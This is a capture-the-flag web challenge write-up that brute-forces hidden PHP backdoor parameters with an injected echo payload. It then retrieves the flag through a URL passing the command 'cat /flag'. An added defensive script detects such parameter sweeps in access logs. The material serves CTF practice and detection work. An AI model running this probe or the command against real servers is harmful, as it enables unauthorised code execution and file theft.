[Web] 高明的黑客 - LanceaKing

xp0int Posted on May 27 2019

It is actually quite simple: extract the `$_GET` parameters from each PHP file and brute-force them one by one.

find.py:

```python
#!/usr/bin/env python3
import os
import re

import requests

url = 'http://localhost/src/'
# Every parameter name read as $_GET['name'] in a source file
ptn = re.compile(br"\$_GET\['(\w+)'\]")
# Marker that only shows up in the response if the injected echo was executed
ptn1 = re.compile(br'>>> (\w+) !!!')

i = 0
# Walk the local copy of the challenge source in reverse directory order
for f in list(os.scandir('/var/www/html/src'))[::-1]:
    i += 1
    print(i, end='\r')  # progress counter
    with open(f.path, 'rb') as fp:
        data = fp.read()
    # Try each distinct parameter name found in this file once
    for get in set(ptn.findall(data)):
        get = get.decode('ascii')
        cmd = 'echo ">>> %s !!!";' % get
        r = requests.get(url + f.name, params={get: cmd})
        if ptn1.search(r.content) is not None:
            # The payload was executed: report file and parameter, then stop
            print()
            print(f.name, get)
            raise SystemExit
```

![title](https://leanote.com/api/file/getImage?fileId=5ceba65eab644130190026d6)

get flag: `/xk0SzyKwfzw.php?Efa5BVG=cat /flag`
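The sweep that find.py performs leaves a distinctive trail in the web server's access log: one client sending PHP `echo` statements as values to many different file/parameter pairs. The following is an added example, not part of the original write-up, that flags such clients; the log lines, file names, parameter names, the `echo` heuristic and the threshold are all constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format); hosts, files and
# parameter names are made up for this example.
SAMPLE_LOG = '''\
10.0.0.5 - - [27/May/2019:10:00:01 +0000] "GET /src/a1.php?k1=echo+%22%3E%3E%3E+k1+%21%21%21%22%3B HTTP/1.1" 200 0 "-" "python-requests/2.21.0"
10.0.0.5 - - [27/May/2019:10:00:01 +0000] "GET /src/a1.php?k2=echo+%22%3E%3E%3E+k2+%21%21%21%22%3B HTTP/1.1" 200 0 "-" "python-requests/2.21.0"
10.0.0.9 - - [27/May/2019:10:00:02 +0000] "GET /src/index.php?page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [27/May/2019:10:00:02 +0000] "GET /src/b2.php?x9=echo+%22%3E%3E%3E+x9+%21%21%21%22%3B HTTP/1.1" 200 14 "-" "python-requests/2.21.0"
10.0.0.9 - - [27/May/2019:10:00:03 +0000] "GET /src/search.php?q=echo+dot HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3} ')
# Heuristic (an assumption of this example): the value is a PHP echo statement.
PHP_ECHO = re.compile(r'\becho\b.*;\s*$', re.S)


def find_param_sweeps(lines, threshold=3):
    """Map client IP -> sorted (path, param) pairs that received code-like
    values, for clients that probed at least `threshold` distinct pairs."""
    probes = defaultdict(set)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith('.php'):
            continue
        # parse_qsl undoes the URL encoding applied by the HTTP client
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if PHP_ECHO.search(value):
                probes[ip].add((parts.path, name))
    return {ip: sorted(p) for ip, p in probes.items() if len(p) >= threshold}


if __name__ == '__main__':
    for ip, pairs in find_param_sweeps(SAMPLE_LOG.splitlines()).items():
        print(ip, len(pairs), 'distinct file/parameter probes:', pairs)
```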